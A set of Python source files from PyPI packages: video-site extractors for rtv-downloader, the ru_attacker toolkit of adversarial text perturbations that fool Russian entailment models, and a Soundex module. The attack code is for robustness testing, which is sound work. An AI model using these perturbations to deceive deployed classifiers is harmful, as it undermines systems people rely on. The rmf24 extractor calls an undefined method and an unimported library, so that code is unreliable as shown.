def load_html(self) -> None:
r = requests.get(self.url)
r.encoding = 'utf-8'
self.response = r
self.html = r.text
def get_info(self) -> dict:
"""Get information about the videos from YoutubeDL package."""
with suppress_stdout():
with youtube_dl.YoutubeDL() as ydl:
info_dict = ydl.extract_info(self.url, download=False)
return info_dict
@staticmethod
def update_entries(entries: Entries, data: dict) -> None:
"""Update each entry in the list with some data."""
# TODO: Is mutating the list okay, making copies is such a pain in the ass
for entry in entries:
entry.update(data)
def extract(self) -> Entries:
"""Extract data from the url. Redefine in subclasses."""
raise NotImplementedError('This method must be implemented by subclasses')
def run(self) -> None:
entries = self.extract()
self.update_entries(entries, {
'site': get_domain_name(self.url)
})
if not isinstance(entries, list):
raise TypeError('extract method must return an iterable of dictionaries')
for entry in entries:
video = Video(entry)
self.videos.append(video)
class GenericTitleMixin:
soup: BeautifulSoup
def get_title(self) -> Optional[str]:
meta_tag = self.soup.select_one('meta[property="og:title"]')
if meta_tag:
title = meta_tag.get('content')
return title
return None
class GenericDescriptionMixin:
soup: BeautifulSoup
def get_description(self) -> Optional[str]:
meta_tag = self.soup.select_one('meta[property="og:description"]')
if meta_tag:
description = meta_tag.get('content')
return description
return None | /rtv-downloader-2.0.8.tar.gz/rtv-downloader-2.0.8/rtv/extractors/common.py | 0.642545 | 0.16944 | common.py | pypi |
import re
from datetime import datetime
from typing import Optional
from bs4 import BeautifulSoup
from rtv.extractors.common import (
Extractor, GenericDescriptionMixin, GenericTitleMixin
)
from rtv.utils import get_ext
class Rmf24(GenericTitleMixin, GenericDescriptionMixin, Extractor):
SITE_NAME = 'rmf24.pl'
_VALID_URL = r'https?://(?:www\.)?rmf24\.pl/'
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.load_html()
self.soup = BeautifulSoup(self.html, 'lxml')
# TODO: use decorators to mark the need to use bs4?
# TODO: make_soup(html=Optional) or/and load_html(url=Optional)
def get_date(self) -> Optional[datetime]:
meta_tag = self.soup.select_one('meta[itemprop=datePublished]')
if meta_tag:
date_published_str = meta_tag.get('content')
return datetime.strptime(date_published_str, '%Y-%m-%dT%H:%M:%S')
return None
@staticmethod
def extract_entry(scraped_info):
"""
Transform scraped_info dictionary into an entry, under the assumption that there is only
one track in 'track' list, since each video/audio is instantiated individually
on the RMF website and each of them is scraped independently, so there shouldn't be cases
when there are 2 unrelated tracks in one info_dict.
Args:
scraped_info (dict): Video info dict, scraped straight from the website.
Returns:
dict: Entry containing title, formats (url, quality), thumbnail, etc.
"""
quality_mapping = { # ascending in terms of quality
'lo': 0,
'hi': 1
}
entry = scraped_info['tracks'][0]
'''
The structure of entry is as follows:
'src': {
'hi': [
{
'src': 'http://v.iplsc.com/30-11-gosc-marek-jakubiak/0007124B3CGCAE6P-A1.mp4',
'type': 'video/mp4'
}
],
'lo': [
{
'src': 'http://v.iplsc.com/30-11-gosc-marek-jakubiak/0007124B3CGCAE6P-A1.mp4',
'type': 'video/mp4'
}
]
}
'''
sources = entry.pop('src')
# TODO: #LOW_PRIOR Remove date from title of audio files e.g. '10.06 Gość: Jarosław Gowin'
formats = []
for src_name, src in sources.items():
url = src[0]['src']
formats.append({
'url': url,
'quality': quality_mapping[src_name],
'ext': get_ext(url),
'width': int(scraped_info.get('width', 0)),
'height': int(scraped_info.get('height', 0)),
})
# outer level url and ext come from the video of the lowest quality
# you can access rest of the urls under 'formats' key
worst_format = min(formats, key=lambda f: f['quality'])
entry.update({
**entry.pop('data'),
'formats': formats,
'url': worst_format['url'],
'ext': worst_format['ext']
})
return entry
def _scrape_entries(self):
entries = []
pattern = re.compile(r'Video.createInstance\((?P<js_object>{.*?})\);', re.DOTALL)
scripts = self.soup.findAll('script', text=pattern)
for script in scripts:
matches = pattern.findall(script.text)
for data in matches: # matches is a list of matched strings, not match objects
info_dict = js2py.eval_js(f'Object({data})').to_dict()
entries.append(self.extract_entry(info_dict))
# temporarily return only audio entries if present, otherwise return all video entries
audio_entries = [e for e in entries if e.get('type', 'video') == 'audio']
if audio_entries:
entries = audio_entries
return entries
def extract(self):
audio_url = self._get_audio_source_url()
extension = get_ext(audio_url)
entries = [{
'title': self.get_title(),
'description': self.get_description(),
'date': self.get_date(),
'url': audio_url,
'ext': extension
}]
return entries | /rtv-downloader-2.0.8.tar.gz/rtv-downloader-2.0.8/rtv/extractors/rmf24.py | 0.50952 | 0.165222 | rmf24.py | pypi |
from transformers import RobertaTokenizer, RobertaForSequenceClassification
from .basic_model import BasicModel
from torch.utils.data import Dataset, DataLoader
from .set_dataset import get_data
import torch
import tqdm
__all__ = ["RobertaModel"]
class DatasetTERRa(Dataset):
def __init__(self, dataframe, tokenizer, max_len):
self.len = len(dataframe)
self.data = dataframe
self.tokenizer = tokenizer
self.max_len = max_len
def __getitem__(self, index):
premise = self.data.iloc[index]['premise']
hypothesis = self.data.iloc[index]['hypothesis']
label = self.data.iloc[index]['label']
pair_token_ids_padded = torch.zeros(self.max_len, dtype=torch.long)
attention_mask_ids_padded = torch.zeros(self.max_len, dtype=torch.long)
premise_id = self.tokenizer.encode(premise, add_special_tokens=False)
hypothesis_id = self.tokenizer.encode(hypothesis, add_special_tokens=False)
pair_token_ids = [self.tokenizer.cls_token_id] + premise_id + [self.tokenizer.sep_token_id] + hypothesis_id + [
self.tokenizer.sep_token_id]
if len(pair_token_ids) < self.max_len:
pair_token_ids_padded[:len(pair_token_ids)] = torch.tensor(pair_token_ids)
else:
pair_token_ids_padded = torch.tensor(pair_token_ids[:self.max_len])
premise_len = len(premise_id)
hypothesis_len = len(hypothesis_id)
attention_mask_ids = torch.tensor([1] * (premise_len + hypothesis_len + 3))
if len(attention_mask_ids) < self.max_len:
attention_mask_ids_padded[:len(attention_mask_ids)] = attention_mask_ids
else:
attention_mask_ids_padded = attention_mask_ids[:self.max_len]
return {
'input_ids': pair_token_ids_padded,
'attention_mask': attention_mask_ids_padded,
'labels': torch.tensor(label, dtype=torch.long)
}
def __len__(self):
return self.len
class RobertaModel(BasicModel):
def __init__(self, model_dir):
super().__init__()
self.model = RobertaForSequenceClassification.from_pretrained(model_dir)
self.model.to(self.device).eval()
self.tokenizer = RobertaTokenizer.from_pretrained(model_dir)
self.max_len = 512
def prepare_data(self, premise, hypothesis):
pair_token_ids_padded = torch.zeros(self.max_len, dtype=torch.long)
attention_mask_ids_padded = torch.zeros(self.max_len, dtype=torch.long)
premise_id = self.tokenizer.encode(premise, add_special_tokens=False)
hypothesis_id = self.tokenizer.encode(hypothesis, add_special_tokens=False)
pair_token_ids = [self.tokenizer.cls_token_id] + premise_id + [self.tokenizer.sep_token_id] + hypothesis_id + [
self.tokenizer.sep_token_id]
if len(pair_token_ids) < self.max_len:
pair_token_ids_padded[:len(pair_token_ids)] = torch.tensor(pair_token_ids)
else:
pair_token_ids_padded = torch.tensor(pair_token_ids[:self.max_len])
premise_len = len(premise_id)
hypothesis_len = len(hypothesis_id)
attention_mask_ids = torch.tensor([1] * (premise_len + hypothesis_len + 3))
if len(attention_mask_ids) < self.max_len:
attention_mask_ids_padded[:len(attention_mask_ids)] = attention_mask_ids
else:
attention_mask_ids_padded = attention_mask_ids[:self.max_len]
return {"input_ids": pair_token_ids_padded, "attention_mask": attention_mask_ids_padded}
def predict(self, inputs):
with torch.no_grad():
input_ids = inputs["input_ids"].reshape((1, -1)).to(self.device)
attention_mask = inputs["attention_mask"].reshape((1, -1)).to(self.device)
prediction = self.model(input_ids=input_ids, attention_mask=attention_mask).logits
prediction = torch.argmax(prediction, dim=1)
return int(prediction[0])
def validate(self, filename):
data = get_data(filename)
dataset = DatasetTERRa(data, self.tokenizer, self.max_len)
loader = DataLoader(dataset, batch_size=16)
targets = data["label"].tolist()
preds = []
with torch.no_grad():
for batch in tqdm.tqdm(loader):
x = self.model(
input_ids=batch["input_ids"].to(self.device),
attention_mask=batch["attention_mask"].to(self.device)
).logits.argmax(-1).tolist()
preds.extend(x)
return sum([p == t for p, t in zip(preds, targets)]) / len(targets) | /ru_attacker-0.0.5-py3-none-any.whl/ru_attacker/models/Roberta_model.py | 0.770206 | 0.312816 | Roberta_model.py | pypi |
from transformers import T5Tokenizer, T5ForConditionalGeneration
from typing import List, Dict
from .basic_model import BasicModel
import torch
from torch.utils.data import Dataset, DataLoader
import re
import jsonlines
import tqdm
__all__ = ["T5Model"]
class T5Dataset(Dataset):
def __init__(self, items):
super().__init__()
self.items = items
def __len__(self):
return len(self.items)
def __getitem__(self, index):
return self.items[index]
class T5Collator:
def __init__(self, pad_token_id):
self.pad_token_id = pad_token_id
def __call__(self, batch: List[Dict[str, List[int]]]) -> Dict[str, torch.Tensor]:
m = max(len(x["input_ids"]) for x in batch)
d = {
"input_ids": torch.stack(
[torch.tensor(x["input_ids"] + [self.pad_token_id] * (m - len(x["input_ids"]))) for x in batch]),
"attention_mask": torch.stack(
[torch.tensor(x["attention_mask"] + [0] * (m - len(x["attention_mask"]))) for x in batch])
}
return d
class T5Model(BasicModel):
def __init__(self, model_dir):
super().__init__()
self.model = T5ForConditionalGeneration.from_pretrained(model_dir)
self.model.to(self.device).eval()
self.tokenizer = T5Tokenizer.from_pretrained(model_dir)
self.max_len = 200
def prepare_data(self, premise, hypothesis):
inputs = ["terra посылка: " + premise + " гипотеза: " + hypothesis]
res = self.tokenizer.batch_encode_plus(
inputs,
return_attention_mask=False,
max_length=self.max_len,
truncation=True
)
return {
"input_ids": torch.tensor(
res["input_ids"][0] + [self.tokenizer.pad_token_id] * (self.max_len - len(res["input_ids"][0]))),
"attention_mask": torch.tensor(
[1] * len(res["input_ids"][0]) + [0] * (self.max_len - len(res["input_ids"][0]))),
}
@staticmethod
def postprocess(s):
s = s.replace("<pad>", "")
s = s.replace("</s>", "")
s = re.sub("\s+", " ", s)
s = s.strip()
return s
def predict(self, inputs):
di = {"следует": 1, "не следует": 0}
with torch.no_grad():
x = self.model.generate(
input_ids=inputs["input_ids"].reshape((1, -1)).to(self.device),
attention_mask=inputs["attention_mask"].reshape((1, -1)).to(self.device),
max_length=16,
do_sample=False,
num_beams=1
)
preds_i = self.tokenizer.batch_decode(x.to("cpu"))
for p in preds_i:
p = self.postprocess(p)
if p in di:
return di[p]
else:
return False
def validate(self, filename):
data = self._get_data(filename)
data_ids = self._tokenize(data)
collator = T5Collator(pad_token_id=self.tokenizer.pad_token_id)
ds_test = T5Dataset(self._get_items(data_ids))
loader = DataLoader(ds_test, batch_size=8, collate_fn=collator)
targets = [i["targets"] for i in data]
preds = []
with torch.no_grad():
for batch in tqdm.tqdm(loader):
x = self.model.generate(
input_ids=batch["input_ids"].to(self.device),
attention_mask=batch["attention_mask"].to(self.device),
max_length=16,
do_sample=False,
num_beams=1
)
preds_i = self.tokenizer.batch_decode(x.to("cpu"))
for p in preds_i:
p = self.postprocess(p)
preds.append(p)
return sum([p == t for p, t in zip(preds, targets)])/len(targets)
@staticmethod
def _get_data(filename):
data = []
di = {"entailment": "следует", "not_entailment": "не следует"}
with jsonlines.open(filename) as reader:
for obj in reader:
idx = obj["idx"]
inputs = "terra посылка: " + obj["premise"] + " гипотеза: " + obj["hypothesis"]
output = di[obj["label"]]
data.append({"idx": idx, "inputs": inputs, "targets": output})
return data
def _tokenize(self, data):
inputs = []
targets = []
for x in data:
inputs.append(x["inputs"])
if "targets" in x:
targets.append(x["targets"])
res = self.tokenizer.batch_encode_plus(
inputs,
return_attention_mask=False,
max_length=self.max_len,
truncation=True
)
if len(targets) != 0:
assert len(targets) == len(inputs)
res["target_ids"] = self.tokenizer.batch_encode_plus(
targets,
return_attention_mask=False,
max_length=self.max_len,
truncation=True
)["input_ids"]
return res
@staticmethod
def _get_items(ids):
items = []
for i in range(len(ids["input_ids"])):
item = {
"input_ids": ids["input_ids"][i],
"attention_mask": [1] * len(ids["input_ids"][i]),
}
items.append(item)
return items | /ru_attacker-0.0.5-py3-none-any.whl/ru_attacker/models/T5_model.py | 0.823364 | 0.323487 | T5_model.py | pypi |
from abc import ABC, abstractmethod
import language_tool_python
import numpy as np
import tensorflow_hub as hub
import tensorflow_text
__all__ = ["BasicAttack"]
embed = hub.load("https://tfhub.dev/google/universal-sentence-encoder-multilingual/3")
tool = language_tool_python.LanguageTool('ru-RU')
class BasicAttack(ABC):
"""
A basic class for attacks
"""
@abstractmethod
def attack(self, model, dataset):
"""
A method to attack models
:param model: a model to attack
:param dataset: a dataset on which the attack is performed
:return: results, "status of attack", correct_attack
"""
pass
@staticmethod
def print_results(results):
"""
A method to print results
:param results: results dictionary
:return: None
"""
di = {1: "entailment", 0: "not_entailment"}
if results["attacked label"][-1] != None:
print(f"""
[Succeeded / Failed / Skipped / Total] {results["attack"].count("succeeded")} / {results["attack"].count("failed")} / {results["attack"].count("skipped")} / {len(results["attack"])}:
{di[results["original label"][-1]]} --> {di[results["attacked label"][-1]]}
original premise: {results["original premise"][-1]}
original hypothesis: {results["original hypothesis"][-1]}
transformed: {results["transformed"][-1]}
""")
else:
print(f"""
[Succeeded / Failed / Skipped / Total] {results["attack"].count("succeeded")} / {results["attack"].count("failed")} / {results["attack"].count("skipped")} / {len(results["attack"])}:
{di[results["original label"][-1]]} --> Skipped
""")
@staticmethod
def predict_after_transform_hypothesis(model, premise, transformed, results):
"""
A method to make prediction after a transformation
:param model: attacked model
:param premise: premise
:param transformed: transformed hypothesis
:param results: results dictionary
:return: prediction, results
"""
prediction = model.predict(model.prepare_data(premise, transformed))
results["attacked label"].append(prediction)
results["transformed"].append(transformed)
return prediction, results
@staticmethod
def predict_after_transform_premise(model, hypothesis, transformed, results):
"""
A method to make prediction after a transformation
:param model: attacked model
:param hypothesis: hypothesis
:param transformed: transformed premise
:param results: results dictionary
:return: prediction, results
"""
prediction = model.predict(model.prepare_data(transformed, hypothesis))
results["attacked label"].append(prediction)
results["transformed"].append(transformed)
return prediction, results
@staticmethod
def attack_decorator(func):
"""
A decorator for attack function
:param func: attack function
:return: results
"""
def wrapper(self, model, dataset):
results = {
"original label": [],
"attacked label": [],
"original premise": [],
"original hypothesis": [],
"transformed": [],
"attack": [],
}
total = 0
correct = 0
correct_attack = 0
for i, row in dataset.iterrows():
total += 1
premise = row["premise"]
hypothesis = row["hypothesis"]
label = row["label"]
prediction = model.predict(model.prepare_data(premise, hypothesis))
if label == prediction:
correct += 1
results["original premise"].append(premise)
results["original hypothesis"].append(hypothesis)
results["original label"].append(label)
results, attack, correct_attack = func(self, results, model, premise, hypothesis, label, correct_attack)
if attack == "succeeded":
results["attack"].append("succeeded")
elif attack == "skipped":
correct_attack += 1
results["transformed"].append(None)
results["attacked label"].append(None)
results["attack"].append("skipped")
elif attack == "failed":
results["attack"].append("failed")
self.print_results(results)
print(
f"Accuracy before attack {round(correct / total, 2)} --> Accuracy after attack {round(correct_attack / total, 2)}"
)
print(f"Success rate {round(results['attack'].count('succeeded') / len(results['attack']), 2)}")
return results
return wrapper
@staticmethod
def check_grammar(text):
"""
A grammar constraint
:param text: text to check
:return: True or False
"""
matches = tool.check(text)
grammar_mistakes = [1 for m in matches if m.category == "GRAMMAR"]
if grammar_mistakes:
return False
else:
return True
@staticmethod
def check_semantics(original, transformed):
"""
A semantics constraint
:param original: original text
:param transformed: transformed text
:return: True or False
"""
score = np.inner(embed(original), embed(transformed))
if score >= 0.8:
return True
else:
return False | /ru_attacker-0.0.5-py3-none-any.whl/ru_attacker/attacks/basic_attack.py | 0.882377 | 0.454351 | basic_attack.py | pypi |
from .basic_attack import BasicAttack
from transformers import M2M100ForConditionalGeneration, M2M100Tokenizer
import torch
import random
__all__ = ["BackTranslation"]
class BackTranslation(BasicAttack):
def __init__(self, languages=None):
if torch.cuda.is_available():
self.device = "cuda"
else:
self.device = "cpu"
self.model = M2M100ForConditionalGeneration.from_pretrained("facebook/m2m100_418M")
self.tokenizer = M2M100Tokenizer.from_pretrained("facebook/m2m100_418M")
self.tokenizer.src_lang = "ru"
self.model.to(self.device)
if languages:
self.languages = languages
else:
self.languages = ["es", "en", "fr", "de", "pt", "bs", "be", "uk", "bg", "hr", "cs", "mk", "pl", "sr", "sk", "sl"]
@BasicAttack.attack_decorator
def attack(self, results, model, premise, hypothesis, label, correct_attack):
last = None
random.shuffle(self.languages)
for lang in self.languages:
transformed = self.translate_back(lang, hypothesis)
if not self.check_semantics(hypothesis, transformed) or not self.check_grammar(transformed):
continue
prediction = model.predict(model.prepare_data(premise, transformed))
if label != prediction:
results["attacked label"].append(prediction)
results["transformed"].append(transformed)
return results, "succeeded", correct_attack
else:
last = transformed
if last:
results["attacked label"].append(label)
results["transformed"].append(last)
correct_attack += 1
return results, "failed", correct_attack
else:
return results, "skipped", correct_attack
def translate_back(self, target_lang, text):
encoded_ru = self.tokenizer(text, return_tensors="pt")
generated_tokens = self.model.generate(**encoded_ru.to(self.device),
forced_bos_token_id=self.tokenizer.get_lang_id(target_lang))
translation = self.tokenizer.batch_decode(generated_tokens, skip_special_tokens=True)
self.tokenizer.src_lang = target_lang
encoded_uk = self.tokenizer(translation, return_tensors="pt")
generated_tokens = self.model.generate(**encoded_uk.to(self.device),
forced_bos_token_id=self.tokenizer.get_lang_id("ru"))
back_translation = self.tokenizer.batch_decode(generated_tokens, skip_special_tokens=True)
return back_translation[0] | /ru_attacker-0.0.5-py3-none-any.whl/ru_attacker/attacks/backtranslation.py | 0.612078 | 0.189409 | backtranslation.py | pypi |
class Attack:
"""
A wrapper for attacks
"""
def __init__(self, transformation, goal_function, type_perturbation, constraints=None, search_method=None):
"""
It contains of four main components and a type of perturbation which is required for the RTE task
:param transformation: an obligatory component, type of transformation
:param goal_function: an obligatory component, type of goal function
:param type_perturbation: an obligatory component, to what part the perturbation is applied
:param constraints: a facultative component, constraints to filter samples
:param search_method: a facultative component, a method to find attack
"""
self.transformation = transformation
self.goal_function = goal_function
self.constraints = constraints
self.search_method = search_method
self.type_perturbation = type_perturbation
def attack(self, model, dataset):
"""
a method to attack models
:param model: model to attack
:param dataset: dataset on which the attack is performed
:return: results of attack
"""
results = {
"original label": [],
"attacked label": [],
"original premise": [],
"original hypothesis": [],
"transformed": [],
"attack": [],
}
total = 0
correct = 0
correct_attack = 0
for i, row in dataset.iterrows():
total += 1
premise = row["premise"]
hypothesis = row["hypothesis"]
label = row["label"]
prediction = model.predict(model.prepare_data(premise, hypothesis))
if label == prediction:
correct += 1
results["original premise"].append(premise)
results["original hypothesis"].append(hypothesis)
results["original label"].append(label)
if self.type_perturbation == "hypothesis":
transformations = self.transformation.transform(hypothesis)
elif self.type_perturbation == "premise":
transformations = self.transformation.transform(premise)
else:
raise TypeError("Transformations only to hypothesis and premise are supported")
if self.search_method:
result, transformation, prediction = self.search_method.search(
premise, hypothesis, label, transformations,
self.goal_function, self.type_perturbation, model, self.constraints
)
if result == "skipped":
correct_attack += 1
results["transformed"].append(None)
results["attacked label"].append(None)
results["attack"].append("skipped")
self.print_results(results)
continue
results["attacked label"].append(prediction)
results["transformed"].append(transformation)
if label == prediction:
correct_attack += 1
if result == "succeeded":
results["attack"].append("succeeded")
else:
results["attack"].append("failed")
self.print_results(results)
continue
transformation = transformations[0]
if self.type_perturbation == "hypothesis":
valid, results = self.check(hypothesis, transformation, results)
else:
valid, results = self.check(premise, transformation, results)
if not valid:
correct_attack += 1
self.print_results(results)
continue
if self.type_perturbation == "hypothesis":
prediction = model.predict(model.prepare_data(premise, transformation))
elif self.type_perturbation == "premise":
prediction = model.predict(model.prepare_data(transformation, hypothesis))
if label == prediction:
correct_attack += 1
results["attacked label"].append(prediction)
results["transformed"].append(transformation)
if self.goal_function.success(label, prediction):
results["attack"].append("succeeded")
else:
results["attack"].append("failed")
self.print_results(results)
print(
f"Accuracy before attack {round(correct / total, 2)} --> Accuracy after attack {round(correct_attack / total, 2)}"
)
print(f"Success rate {round(results['attack'].count('succeeded') / len(results['attack']), 2)}")
return results
def check(self, original, transformation, results):
if self.constraints:
for constraint in self.constraints:
if not constraint.check(original, transformation):
results["transformed"].append(None)
results["attacked label"].append(None)
results["attack"].append("skipped")
return False, results
return True, results
@staticmethod
def print_results(results):
"""
A method to print results
:param results: results dictionary
:return: None
"""
di = {1: "entailment", 0: "not_entailment"}
if results["attacked label"][-1] != None:
print(f"""
[Succeeded / Failed / Skipped / Total] {results["attack"].count("succeeded")} / {results["attack"].count("failed")} / {results["attack"].count("skipped")} / {len(results["attack"])}:
{di[results["original label"][-1]]} --> {di[results["attacked label"][-1]]}
original premise: {results["original premise"][-1]}
original hypothesis: {results["original hypothesis"][-1]}
transformed: {results["transformed"][-1]}
""")
else:
print(f"""
[Succeeded / Failed / Skipped / Total] {results["attack"].count("succeeded")} / {results["attack"].count("failed")} / {results["attack"].count("skipped")} / {len(results["attack"])}:
{di[results["original label"][-1]]} --> Skipped
""") | /ru_attacker-0.0.5-py3-none-any.whl/ru_attacker/attacks/attack.py | 0.797162 | 0.713637 | attack.py | pypi |
from natasha import (
Segmenter,
NewsEmbedding,
NewsSyntaxParser,
Doc
)
from .basic_attack import BasicAttack
__all__ = ["YodaStyle"]
class YodaStyle(BasicAttack):
def __init__(self):
self.segmenter = Segmenter()
self.syntax_parser = NewsSyntaxParser(NewsEmbedding())
@BasicAttack.attack_decorator
def attack(self, results, model, premise, hypothesis, label, correct_attack):
transformed = self.yoda_style(hypothesis)
if hypothesis == transformed:
return results, "skipped", correct_attack
prediction, results = self.predict_after_transform_hypothesis(model, premise, transformed, results)
if label == prediction:
correct_attack += 1
return results, "failed", correct_attack
else:
return results, "succeeded", correct_attack
def yoda_style(self, text):
def find_children(parent_id, children, tokens):
# token = tokens[int(parent_id[-1]) - 1]
for tok in tokens:
if tok.head_id == parent_id:
children = find_children(tok.id, children, tokens)
if children == None:
return
children.append(tok.id)
return children
def get_args(arg, tokens):
args = find_children(arg, [arg], tokens)
children = []
for token in tokens:
if token.id in args:
children.append(token.text)
return " ".join(children), args
doc = Doc(text)
doc.segment(self.segmenter)
doc.parse_syntax(self.syntax_parser)
root = None
idx = []
tokens = doc.tokens
subj = None
obj = None
for token in tokens:
if token.rel in ["root", "csubj"] and not root:
root = token.id
if root:
for token in tokens:
if token.head_id == root:
if token.rel == "nsubj":
subj, args = get_args(token.id, tokens)
idx.extend(args)
elif token.rel == "obj":
obj, args = get_args(token.id, tokens)
idx.extend(args)
if subj and obj:
sent = [obj.capitalize(), subj.lower()]
sent.extend([t.text for t in tokens if t.id not in idx])
return " ".join(sent)
else:
return text | /ru_attacker-0.0.5-py3-none-any.whl/ru_attacker/attacks/yoda_style.py | 0.548674 | 0.286169 | yoda_style.py | pypi |
from natasha import (
Segmenter,
NewsEmbedding,
NewsSyntaxParser,
Doc
)
from .basic_attack import BasicAttack
import pymorphy2
__all__ = ["ChangeArguments"]
class ChangeArguments(BasicAttack):
def __init__(self):
self.morph = pymorphy2.MorphAnalyzer()
self.segmenter = Segmenter()
self.syntax_parser = NewsSyntaxParser(NewsEmbedding())
@BasicAttack.attack_decorator
def attack(self, results, model, premise, hypothesis, label, correct_attack):
transformed = self.change_args(hypothesis)
if hypothesis == transformed:
return results, "skipped", correct_attack
prediction, results = self.predict_after_transform_hypothesis(model, premise, transformed, results)
if label == prediction:
correct_attack += 1
if prediction == 1:
return results, "succeeded", correct_attack
else:
return results, "failed", correct_attack
def change_args(self, text):
def inflect(word, case):
if not case:
return word.word
w = word.inflect({case})
if w:
return w.word
else:
return word.word
doc = Doc(text)
doc.segment(self.segmenter)
doc.parse_syntax(self.syntax_parser)
root = None
args = {}
idx = []
for token in doc.tokens:
if token.rel in ["root", "csubj"] and not root:
root = token.id
if root:
for token in doc.tokens:
if token.head_id == root and token.rel in ["nsubj", "obj", "iobj", "obl"]:
args[token.id] = token
idx.append(token.id)
if len(idx) < 2:
return text
if len(idx) % 2 == 0:
for i in range(0, len(idx), 2):
first = self.morph.parse(args[idx[i]].text)[0]
second = self.morph.parse(args[idx[i + 1]].text)[0]
case_first = first.tag.case
case_second = second.tag.case
new_first = inflect(first, case_second)
new_second = inflect(second, case_first)
args[idx[i]] = new_second
args[idx[i + 1]] = new_first
else:
first = self.morph.parse(args[idx[0]].text)[0]
second = self.morph.parse(args[idx[1]].text)[0]
third = self.morph.parse(args[idx[2]].text)[0]
case_first = first.tag.case
case_second = second.tag.case
case_third = third.tag.case
new_first = inflect(first, case_third)
new_second = inflect(second, case_first)
new_third = inflect(third, case_second)
args[idx[0]] = new_second
args[idx[1]] = new_third
args[idx[2]] = new_first
if len(idx) > 3:
for i in range(3, len(idx), 2):
first = self.morph.parse(args[idx[i]].text)[0]
second = self.morph.parse(args[idx[i + 1]].text)[0]
case_first = first.tag.case
case_second = second.tag.case
new_first = inflect(first, case_second)
new_second = inflect(second, case_first)
args[idx[i]] = new_second
args[idx[i + 1]] = new_first
sentence = [args[token.id] if token.id in idx else token.text for token in doc.tokens]
return " ".join(sentence) | /ru_attacker-0.0.5-py3-none-any.whl/ru_attacker/attacks/change_arguments.py | 0.485844 | 0.30905 | change_arguments.py | pypi |
from .basic_transformation import BasicTransformation
import pymorphy2
from natasha import (
Segmenter,
NewsEmbedding,
NewsSyntaxParser,
Doc
)
__all__ = ["ChangeArguments"]
class ChangeArguments(BasicTransformation):
def __init__(self):
self.morph = pymorphy2.MorphAnalyzer()
self.segmenter = Segmenter()
self.syntax_parser = NewsSyntaxParser(NewsEmbedding())
def transform(self, text):
doc = Doc(text)
doc.segment(self.segmenter)
doc.parse_syntax(self.syntax_parser)
root = None
args = {}
idx = []
for token in doc.tokens:
if token.rel in ["root", "csubj"] and not root:
root = token.id
if root:
for token in doc.tokens:
if token.head_id == root and token.rel in ["nsubj", "obj", "iobj", "obl"]:
args[token.id] = token
idx.append(token.id)
if len(idx) < 2:
return [text]
if len(idx) % 2 == 0:
for i in range(0, len(idx), 2):
first = self.morph.parse(args[idx[i]].text)[0]
second = self.morph.parse(args[idx[i + 1]].text)[0]
case_first = first.tag.case
case_second = second.tag.case
new_first = self.inflect(first, case_second)
new_second = self.inflect(second, case_first)
args[idx[i]] = new_second
args[idx[i + 1]] = new_first
else:
first = self.morph.parse(args[idx[0]].text)[0]
second = self.morph.parse(args[idx[1]].text)[0]
third = self.morph.parse(args[idx[2]].text)[0]
case_first = first.tag.case
case_second = second.tag.case
case_third = third.tag.case
new_first = self.inflect(first, case_third)
new_second = self.inflect(second, case_first)
new_third = self.inflect(third, case_second)
args[idx[0]] = new_second
args[idx[1]] = new_third
args[idx[2]] = new_first
if len(idx) > 3:
for i in range(3, len(idx), 2):
first = self.morph.parse(args[idx[i]].text)[0]
second = self.morph.parse(args[idx[i + 1]].text)[0]
case_first = first.tag.case
case_second = second.tag.case
new_first = self.inflect(first, case_second)
new_second = self.inflect(second, case_first)
args[idx[i]] = new_second
args[idx[i + 1]] = new_first
sentence = [args[token.id] if token.id in idx else token.text for token in doc.tokens]
return [" ".join(sentence)]
@staticmethod
def inflect(word, case):
if not case:
return word.word
w = word.inflect({case})
if w:
return w.word
else:
return word.word | /ru_attacker-0.0.5-py3-none-any.whl/ru_attacker/attacks/transformations/change_arguments.py | 0.433022 | 0.216695 | change_arguments.py | pypi |
import re
from abc import ABC, abstractmethod
import pymorphy2
class Soundex(ABC):
_vowels = ''
_table, _vowels_table = str.maketrans('', ''), str.maketrans('', '')
_reduce_regex = re.compile(r'(\w)(\1)+', re.IGNORECASE)
_vowels_regex = re.compile(r'(0+)', re.IGNORECASE)
def __init__(self, delete_first_letter=False, delete_first_coded_letter=False,
delete_zeros=False, code_vowels=False, cut_result=False, seq_cutted_len=4):
"""
Initialization of Soundex object
:param delete_first_letter: remove the first letter from the result code (A169 -> 169)
:param delete_first_coded_letter: remove the first coded letter from the result code (A0169 -> A169)
:param delete_zeros: remove vowels from the result code
:param code_vowels: group and code vowels as ABC letters
:param cut_result: cut result core till N symbols
:param seq_cutted_len: length of the result code
"""
self.delete_first_letter = delete_first_letter
self.delete_first_coded_letter = delete_first_coded_letter
self.delete_zeros = delete_zeros
self.code_vowels = code_vowels
self.cut_result = cut_result
self.seq_cutted_len = seq_cutted_len
def _is_vowel(self, letter):
return letter in self._vowels
def _reduce_seq(self, seq):
return self._reduce_regex.sub(r'\1', seq)
def _translate_vowels(self, word):
if self.code_vowels:
return word.translate(self._vowels_table)
else:
return ''.join('0' if self._is_vowel(letter) else letter for letter in word)
def _remove_vowels_and_paired_sounds(self, seq):
seq = self._vowels_regex.sub('', seq)
seq = self._reduce_seq(seq)
return seq
def _apply_soundex_algorithm(self, word):
word = word.lower()
first, last = word[0], word
last = last.translate(self._table)
last = self._translate_vowels(last)
last = self._reduce_seq(last)
if self.delete_zeros:
last = self._remove_vowels_and_paired_sounds(last)
if self.cut_result:
last = last[:self.seq_cutted_len] if len(last) >= self.seq_cutted_len else last
last += ('0' * (self.seq_cutted_len - len(last)))
if self.delete_first_coded_letter:
last = last[1:]
first_char = '' if self.delete_first_letter else first.capitalize()
return first_char + last.upper()
def get_vowels(self):
return self._vowels
def is_delete_first_coded_letter(self):
return self.delete_first_coded_letter
def is_delete_first_letter(self):
return self.delete_first_letter
@abstractmethod
def transform(self, word):
"""
Converts a given word to Soundex code
:param word: string
:return: Soundex string code
"""
return None
class EnglishSoundex(Soundex):
"""
This version may have differences from original Soundex for English (consonants was splitted in more groups)
"""
_hw_replacement = re.compile(r'[hw]', re.IGNORECASE)
_au_ending = re.compile(r'au', re.IGNORECASE)
_ea_ending = re.compile(r'e[ae]', re.IGNORECASE)
_oo_ue_ew_ending = re.compile(r'(ew|ue|oo)', re.IGNORECASE)
_iey_ending = re.compile(r'([ie]y|ai)', re.IGNORECASE)
_iye_ire_ending = re.compile(r'([iy]e|[iy]re)$', re.IGNORECASE)
_ye_ending = re.compile(r'^ye', re.IGNORECASE)
